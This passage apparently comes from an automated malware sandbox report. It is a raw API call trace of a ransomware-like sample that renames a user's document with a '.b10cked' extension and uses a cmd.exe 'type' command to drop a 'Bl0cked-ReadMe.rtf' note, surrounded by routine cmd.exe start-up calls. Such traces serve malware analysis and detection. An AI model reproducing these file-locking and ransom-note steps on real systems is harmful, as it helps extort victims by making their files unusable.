_MaxCount=0x7) returned -13 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0135.582] _wcsnicmp 
(_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0135.583] _wcsicmp (_String1="-V83XF~1.DOC", _String2=".") returned -1 [0135.583] _wcsicmp (_String1="-V83XF~1.DOC", _String2="..") returned -1 [0135.583] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XF~1.DOC" (normalized: "c:\\users\\eebsym5\\docume~1\\-v83xf~1.doc")) returned 0x20 [0135.583] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x341d50 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0135.583] SetErrorMode (uMode=0x0) returned 0x0 [0135.583] SetErrorMode (uMode=0x1) returned 0x0 [0135.583] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XF~1.DOC", nBufferLength=0x104, lpBuffer=0x20f124, lpFilePart=0x20f10c | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XF~1.DOC", lpFilePart=0x20f10c*="-V83XF~1.DOC") returned 0x26 [0135.583] SetErrorMode (uMode=0x0) returned 0x1 [0135.583] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1" (normalized: "c:\\users\\eebsym5\\docume~1")) returned 0x13 [0135.583] _wcsicmp (_String1="-V83XF~1.DOC", _String2=".") returned -1 [0135.583] _wcsicmp (_String1="-V83XF~1.DOC", _String2="..") returned -1 [0135.583] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XF~1.DOC" (normalized: "c:\\users\\eebsym5\\docume~1\\-v83xf~1.doc")) returned 0x20 [0135.583] SetErrorMode (uMode=0x0) returned 0x0 [0135.583] SetErrorMode (uMode=0x1) returned 0x0 [0135.583] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XF~1.DOC", nBufferLength=0x104, lpBuffer=0x20f5a0, lpFilePart=0x20f338 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XF~1.DOC", lpFilePart=0x20f338*="-V83XF~1.DOC") returned 0x26 [0135.583] SetErrorMode (uMode=0x0) returned 0x1 [0135.584] SetErrorMode (uMode=0x0) returned 0x0 [0135.584] SetErrorMode (uMode=0x1) returned 0x0 [0135.584] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XFbt5-FsW.docx.b10cked", nBufferLength=0x104, 
lpBuffer=0x20f7a8, lpFilePart=0x20f338 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XFbt5-FsW.docx.b10cked", lpFilePart=0x20f338*="-V83XFbt5-FsW.docx.b10cked") returned 0x34 [0135.584] SetErrorMode (uMode=0x0) returned 0x1 [0135.584] SetLastError (dwErrCode=0x0) [0135.584] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XFbt5-FsW.docx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\-v83xfbt5-fsw.docx.b10cked")) returned 0xffffffff [0135.584] GetLastError () returned 0x2 [0135.584] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XF~1.DOC", fInfoLevelId=0x1, lpFindFileData=0x20ecb4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ecb4) returned 0x330f20 [0135.584] FindNextFileW (in: hFindFile=0x330f20, lpFindFileData=0x20ecb4 | out: lpFindFileData=0x20ecb4) returned 0 [0135.584] GetLastError () returned 0x12 [0135.584] FindClose (in: hFindFile=0x330f20 | out: hFindFile=0x330f20) returned 1 [0135.585] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XF~1.DOC", fInfoLevelId=0x1, lpFindFileData=0x341af0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x341af0) returned 0x330f20 [0135.585] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XFbt5-FsW.docx.b10cked", nBufferLength=0x104, lpBuffer=0x20ef4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XFbt5-FsW.docx.b10cked", lpFilePart=0x0) returned 0x34 [0135.585] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XFbt5-FsW.docx", nBufferLength=0x104, lpBuffer=0x20ef4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XFbt5-FsW.docx", lpFilePart=0x0) returned 0x2c [0135.585] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XFbt5-FsW.docx" (normalized: "c:\\users\\eebsym5\\docume~1\\-v83xfbt5-fsw.docx")) returned 0x20 [0135.585] MoveFileExW 
(lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XFbt5-FsW.docx" (normalized: "c:\\users\\eebsym5\\docume~1\\-v83xfbt5-fsw.docx"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XFbt5-FsW.docx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\-v83xfbt5-fsw.docx.b10cked"), dwFlags=0x3) returned 1 [0135.798] FindClose (in: hFindFile=0x330f20 | out: hFindFile=0x330f20) returned 1 [0135.798] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x20ef00 | out: _Buffer=" 1") returned 9 [0135.798] _get_osfhandle (_FileHandle=1) returned 0x7 [0135.798] GetFileType (hFile=0x7) returned 0x2 [0135.799] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0135.799] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x20ee8c | out: lpMode=0x20ee8c) returned 1 [0135.799] _get_osfhandle (_FileHandle=1) returned 0x7 [0135.799] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20eec0 | out: lpConsoleScreenBufferInfo=0x20eec0) returned 1 [0135.799] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0135.817] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x20ef00 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0135.817] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x20eee4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x20eee4*=0x1a) returned 1 [0135.850] _get_osfhandle (_FileHandle=1) returned 0x7 [0135.850] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0135.851] _get_osfhandle (_FileHandle=1) returned 0x7 [0135.851] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0135.851] _get_osfhandle (_FileHandle=0) returned 0x3 [0135.851] 
GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0135.851] SetConsoleInputExeNameW () returned 0x1 [0135.851] GetConsoleOutputCP () returned 0x1b5 [0135.851] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0135.851] SetThreadUILanguage (LangId=0x0) returned 0x409 [0135.851] exit (_Code=0) Process: id = "134" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16880" os_pid = "0xb88" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13575 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13576 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 13577 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 13578 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 13579 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" 
filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 13580 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13581 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13582 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 13583 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 13584 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 13931 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13932 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 13933 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13934 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 13935 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 13936 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = 
"\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 13937 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13938 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 13939 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13940 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13941 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 13942 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 13943 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 13944 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 13945 start_va = 0x1e0000 end_va = 0x2a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" 
Region: id = 13946 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 13947 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 13948 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 13949 start_va = 0x2b0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 13950 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 13951 start_va = 0x2d0000 end_va = 0x2d0fff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 13952 start_va = 0x430000 end_va = 0x530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 13953 start_va = 0x540000 end_va = 0x113ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 13954 start_va = 0x1140000 end_va = 0x12a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Thread: id = 191 os_tid = 0xbb4 [0135.926] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12f96c | out: lpSystemTimeAsFileTime=0x12f96c*(dwLowDateTime=0x8af362a0, dwHighDateTime=0x1d440a9)) [0135.926] GetCurrentProcessId () returned 0xb88 [0135.926] GetCurrentThreadId () returned 0xbb4 [0135.926] GetTickCount () returned 0x2afdd [0135.926] QueryPerformanceCounter (in: lpPerformanceCount=0x12f964 | out: lpPerformanceCount=0x12f964*=19271492678) returned 1 
[0135.926] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0135.926] __set_app_type (_Type=0x1) [0135.926] __p__fmode () returned 0x76b331f4 [0135.926] __p__commode () returned 0x76b331fc [0135.926] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0135.927] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0135.927] GetCurrentThreadId () returned 0xbb4 [0135.927] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbb4) returned 0x38 [0135.927] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0135.927] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0135.927] SetThreadUILanguage (LangId=0x0) returned 0x409 [0135.927] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0135.927] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12f8fc | out: phkResult=0x12f8fc*=0x0) returned 0x2 [0135.927] VirtualQuery (in: lpAddress=0x12f933, lpBuffer=0x12f8cc, dwLength=0x1c | out: lpBuffer=0x12f8cc*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0135.927] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12f8cc, dwLength=0x1c | out: lpBuffer=0x12f8cc*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0135.927] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12f8cc, dwLength=0x1c | out: lpBuffer=0x12f8cc*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0135.927] VirtualQuery (in: 
lpAddress=0x33000, lpBuffer=0x12f8cc, dwLength=0x1c | out: lpBuffer=0x12f8cc*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0135.927] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12f8cc, dwLength=0x1c | out: lpBuffer=0x12f8cc*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0135.927] GetConsoleOutputCP () returned 0x1b5 [0135.927] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0135.927] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0135.928] _get_osfhandle (_FileHandle=1) returned 0x7 [0135.928] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0135.928] _get_osfhandle (_FileHandle=1) returned 0x7 [0135.928] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0135.928] _get_osfhandle (_FileHandle=1) returned 0x7 [0135.928] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0135.928] _get_osfhandle (_FileHandle=0) returned 0x3 [0135.928] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0135.928] _get_osfhandle (_FileHandle=0) returned 0x3 [0135.928] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0135.928] GetEnvironmentStringsW () returned 0x340168* [0135.929] FreeEnvironmentStringsW (penv=0x340168) returned 1 [0135.929] GetEnvironmentStringsW () returned 0x340168* [0135.929] FreeEnvironmentStringsW (penv=0x340168) returned 1 [0135.929] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e86c | out: phkResult=0x12e86c*=0x40) returned 0x0 [0135.929] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e874, lpData=0x12e878, lpcbData=0x12e870*=0x1000 | out: 
lpType=0x12e874*=0x0, lpData=0x12e878*=0x90, lpcbData=0x12e870*=0x1000) returned 0x2 [0135.929] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e874, lpData=0x12e878, lpcbData=0x12e870*=0x1000 | out: lpType=0x12e874*=0x4, lpData=0x12e878*=0x1, lpcbData=0x12e870*=0x4) returned 0x0 [0135.929] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e874, lpData=0x12e878, lpcbData=0x12e870*=0x1000 | out: lpType=0x12e874*=0x0, lpData=0x12e878*=0x1, lpcbData=0x12e870*=0x1000) returned 0x2 [0135.929] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e874, lpData=0x12e878, lpcbData=0x12e870*=0x1000 | out: lpType=0x12e874*=0x4, lpData=0x12e878*=0x0, lpcbData=0x12e870*=0x4) returned 0x0 [0135.929] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e874, lpData=0x12e878, lpcbData=0x12e870*=0x1000 | out: lpType=0x12e874*=0x4, lpData=0x12e878*=0x40, lpcbData=0x12e870*=0x4) returned 0x0 [0135.929] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e874, lpData=0x12e878, lpcbData=0x12e870*=0x1000 | out: lpType=0x12e874*=0x4, lpData=0x12e878*=0x40, lpcbData=0x12e870*=0x4) returned 0x0 [0135.929] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e874, lpData=0x12e878, lpcbData=0x12e870*=0x1000 | out: lpType=0x12e874*=0x0, lpData=0x12e878*=0x40, lpcbData=0x12e870*=0x1000) returned 0x2 [0135.929] RegCloseKey (hKey=0x40) returned 0x0 [0135.929] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e86c | out: phkResult=0x12e86c*=0x40) returned 0x0 [0135.929] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e874, lpData=0x12e878, lpcbData=0x12e870*=0x1000 | out: lpType=0x12e874*=0x0, lpData=0x12e878*=0x40, lpcbData=0x12e870*=0x1000) 
returned 0x2 [0135.930] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e874, lpData=0x12e878, lpcbData=0x12e870*=0x1000 | out: lpType=0x12e874*=0x4, lpData=0x12e878*=0x1, lpcbData=0x12e870*=0x4) returned 0x0 [0135.930] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e874, lpData=0x12e878, lpcbData=0x12e870*=0x1000 | out: lpType=0x12e874*=0x0, lpData=0x12e878*=0x1, lpcbData=0x12e870*=0x1000) returned 0x2 [0135.930] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e874, lpData=0x12e878, lpcbData=0x12e870*=0x1000 | out: lpType=0x12e874*=0x4, lpData=0x12e878*=0x0, lpcbData=0x12e870*=0x4) returned 0x0 [0135.930] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e874, lpData=0x12e878, lpcbData=0x12e870*=0x1000 | out: lpType=0x12e874*=0x4, lpData=0x12e878*=0x9, lpcbData=0x12e870*=0x4) returned 0x0 [0135.930] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e874, lpData=0x12e878, lpcbData=0x12e870*=0x1000 | out: lpType=0x12e874*=0x4, lpData=0x12e878*=0x9, lpcbData=0x12e870*=0x4) returned 0x0 [0135.930] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e874, lpData=0x12e878, lpcbData=0x12e870*=0x1000 | out: lpType=0x12e874*=0x0, lpData=0x12e878*=0x9, lpcbData=0x12e870*=0x1000) returned 0x2 [0135.930] RegCloseKey (hKey=0x40) returned 0x0 [0135.930] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636a [0135.930] srand (_Seed=0x5b88636a) [0135.930] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"" [0135.930] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"" [0135.930] 
GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0135.930] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3418c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0135.930] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0135.930] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0135.930] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0135.931] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0135.931] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0135.931] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0135.931] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0135.931] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0135.931] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0135.931] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0135.931] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0135.931] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0135.931] GetEnvironmentStringsW () returned 0x3422b8* [0135.931] FreeEnvironmentStringsW (penv=0x3422b8) returned 1 [0135.931] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0135.931] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0135.931] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0135.931] 
_wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0135.931] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0135.931] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0135.931] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0135.931] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0135.931] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0135.931] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0135.931] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f638 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0135.931] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12f638, lpFilePart=0x12f634 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f634*="Desktop") returned 0x18 [0135.931] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: 